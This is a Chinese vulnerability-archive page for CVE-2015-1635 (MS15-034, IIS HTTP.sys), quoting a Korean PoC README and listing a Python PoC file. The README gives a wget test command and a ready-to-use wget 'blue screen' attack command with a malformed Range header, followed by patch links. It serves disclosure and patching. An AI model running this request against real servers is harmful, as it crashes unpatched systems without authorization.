关联漏洞
标题:
Microsoft Windows HTTP.sys 远程执行代码漏洞
(CVE-2015-1635)
描述:Microsoft Windows是美国微软(Microsoft)公司发布的一系列操作系统。Microsoft Internet Information Services(IIS)是一套运行于Microsoft Windows中的互联网基本服务。 使用Microsoft IIS 6.0以上版本的Microsoft Windows的HTTP协议堆栈(HTTP.sys)中存在远程执行代码漏洞,该漏洞源于HTTP.sys文件没有正确分析经特殊设计的HTTP请求。成功利用此漏洞的攻击者可以在系统帐户的上下文中执行
描述
CVE-2015-1635
介绍
# MS15-034
MS15-034 POC
"현재 IIS 서버 버전은 알려진 취약점(CVE-2015-1635, MS15-034)이 존재하는 취약한 버전으로 해당 취약점을 활용할 시 원격 코드 실행 혹은 블루스크린 유발 등의 공격에 당할 위험이 존재한다.
- 테스트 구문 : wget --header=""Range: bytes=0-18446744073709551615"" <테스트할 서버 URL>
- 블루스크린 유발 공격 구문 : wget --header=""Range: bytes=18-18446744073709551615"" <공격할 서버 URL>
※ https://technet.microsoft.com/library/security/ms15-034
※ http://blog.alyac.co.kr/303"
"Windows Server 2012 R2 용 보안 패치를 설치한다.
https://www.microsoft.com/ko-KR/download/details.aspx?id=46500"
文件快照
[4.0K] /data/pocs/2afb6ab5a9c02a4810d7ea44c973537f889b03ef
├── [1.3K] MS15-034.py
└── [ 711] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。